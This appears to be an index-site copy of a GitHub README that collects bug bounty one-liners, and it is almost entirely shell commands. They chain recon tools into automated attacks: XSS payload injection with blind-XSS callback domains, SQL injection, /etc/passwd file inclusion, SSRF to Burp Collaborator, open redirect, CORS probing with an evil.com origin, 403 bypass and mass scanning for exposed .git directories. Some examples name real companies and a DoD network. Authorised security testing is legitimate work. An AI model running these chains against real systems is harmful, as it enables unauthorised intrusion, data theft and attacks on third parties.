Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/twseptian/oneliner-bugbounty

oneliner commands for bug bounties
https://github.com/twseptian/oneliner-bugbounty

Last synced: about 1 month ago
JSON representation

oneliner commands for bug bounties

Awesome Lists containing this project

README 

        
# oneliner commands for bug bounties



## Find Subdomain

> projectdiscovery

```bash

subfinder -d target.com -silent | httpx -silent -o urls.txt

```

## Search Subdomain using Gospider

> https://github.com/KingOfBugbounty/KingOfBugBountyTips/

```bash

gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

```



## find .git/HEAD

> @ofjaaah

```bash

curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

```



## Check .git/HEAD

> @ofjaaah

```bash

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

```



## Find XSS

> cihanmehmet

### Single target

```bash

gospider -s "https://www.target.com/" -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt

```

### Multiple target

```bash

gospider -S urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt

```

## Find XSS

> dwisiswant0

```bash

#/bin/bash



hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://your.xss.ht



# save to .sh, and run bash program.sh target.com

```

## Kxss to search param XSS

> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)

```bash

echo http://testphp.vulnweb.com/ | waybackurls | kxss

```



## XSS hunting multiple

> @ofjaaah

```bash

gospider -S domain.txt -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22>'

```



## BXSS - Bling XSS in Parameters

> [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/)

```bash

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '">' -parameters

```



## Blind XSS In X-Forwarded-For Header

> [ethicalhackingplayground](https://github.com/ethicalhackingplayground/bxss/)

```bash

subfinder -d target.com | gau | bxss -payload '">' -header "X-Forwarded-For"

```



## Gxss with single target

> @KathanP19

```bash

echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe

```



## XSS using gf with single target

> @infosecMatter

```bash

echo "http://testphp.vulnweb.com/" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf xss | anew 

```



## XSS without gf

> HacktifyS

```bash

waybackurls testphp.vulnweb.com| grep '=' |qsreplace '">alert(1)' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "alert(1)" && echo "$host \033[0;31m" Vulnerable;done

```

`or`

```bash

gospider -S target.txt -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | grep '=' |qsreplace '">alert(1)' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "alert(1)" && echo "$host \033[0;31m" Vulnerable;done

```



## XSS qsreplace

> @KingOfBugBounty

```bash

gospider -a -s https://site.com -t 3 -c 100 |  tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22>'

```



## XSS httpx

> @ofjaah

```bash

httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo "(http|https)://[^/"].* | tr -d '[]' | anew  | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace ""

```

## Automating XSS using Dalfox, GF and Waybackurls

> [Automating XSS using Dalfox, GF and Waybackurls](https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75)

```bash

cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)

```



## XSS from javascript hidden params

> @0xJin

```bash

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

```



## XSS freq

> @ofjaaah

```bash

echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '">' | freq

```



## Find xss

> @skothastad

```bash

cat targets | waybackurls | anew | grep "=" | gf xss | nilo | Gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403

```



> @mamunwhh

```bash

cat hosts.txt | ffuf -w - -u "FUZZ/sign-in?next=javascript:alert(1);" -mr "javascript:alert(1)" 

```



> @SaraBadran18

```bash

cat domainlist.txt | subfinder | dnsx | waybackurl | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b your.xss.ht -o xss.txt

```



## Find XSS + knoxss

> @ofjaaah

```bash

echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh 

```



## Dump In-Scope Assests from Bounty Program

### BugCrowd Programs

> @dwisiswant0

```bash

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

```



## Recon.dev

> @ofjaaah

```bash

curl "https://recon.dev/api/search?key=YOURAPIKEY&domain=target.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

```



## Jaeles scan to bugbounty targets.

> @KingOfBugbounty

```bash

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @

```

> @ofjaah

```bash

curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'

```



## Nuclei scan to bugbounty targets.

> @hack_fish

```bash

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | httpx -silent | xargs -n 1 gospider -o output -s ; cat output/* | egrep -o 'https?://[^ ]+' | nuclei -t ~/nuclei-templates/ -o result.txt

```

> @ofjaah

```bash

amass enum -passive -norecursive -d https://target.com -o domain ; httpx -l domain -silent -threads 10 | nuclei -t nuclei-templates -o result -timeout 30

```



## Endpoints, by apks

> @ofjaaah

```bash

apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|http://schemas.android\|google\|http://goo.gl"

```



## Find Subdomains TakeOver

> hahwul

```bash

subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

```



## CORS Misconfiguration

> manas_hunter

```bash

site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

```



## SQL Injection

> @ofjaaah

```bash

findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch --random-agent --level 1

```



## Search SQLINJECTION using qsreplace search syntax error

> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)

```bash

grep "="  .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"

```



## SQLi-TimeBased scanner

> @slv0d

```bash

gau DOMAIN.tld  | sed 's/=[^=&]*/=YOUR_PAYLOAD/g' | grep ?*= | sort -u | while read host;do (time -p curl -Is $host) 2>&1 | awk '/real/ { r=$2;if (r >= TIME_OF_SLEEP ) print h " => SQLi Time-Based vulnerability"}' h=$host ;done

```



## Recon to search SSRF Test

> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)

```bash

findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://YOUR.burpcollaborator.net

```



## Using shodan & Nuclei

> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)



Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates.

```bash

shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/

```



## Using Chaos to jaeles "How did I find a critical today?.

> [KingOfBugbounty](https://github.com/KingOfBugbounty/KingOfBugBountyTips)



To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates.

```bash

chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ 

```

edited **if we don't have chaos api_key**

```bash

cat domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s ~/Tools/jaeles-signatures -u @

```



## Check Blind ssrf in Header,Path,Host & check xss via web cache poisoning.

> @sratarun

```bash

cat domains.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.yourburpcollabrotort'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.yourburpcollabrotort'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.yourburpcollabrotort'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaborator/ --max-time 2); echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.yourburpcollabrotort HTTP/1.1 ""\n";done\

```



### Local File Inclusion

> @dwisiswant0

```bash

gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

```



### Open-redirect

> @dwisiswant0

```bash

export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

```



## Directory Listing



### (Feroxbuster) common command

```bash

feroxbuster -u https://target.com --insecure -d 1 -e -L 4 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

```

### (Feroxbuster) Multiple values

> @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster)

```bash

feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

```

### (Feroxbuster) Read urls from STDIN; pipe only resulting urls out to another tool

> @epi052 or [feroxbuster](https://github.com/epi052/feroxbuster)

```bash

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

```



# search javascript file

> @ofjaaah

```bash

gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt

```



# Uncover

>  [projectdiscovery/uncover](https://github.com/projectdiscovery/uncover)

```bash

uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei

uncover -q target -f ip | naabu

echo jira | uncover -e shodan,censys -silent

```

> @ofjaah

```bash

uncover -q 'org:"DoD Network Information Center"' | httpx -silent | nuclei -silent -severity low,medium,high,critical

```



# Find admin login

> @0x_rood

```bash

cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin"

```



# 403 login Bypass

> @_bughunter

```bash

cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent

```



# Recon Parameters

```bash

echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive

```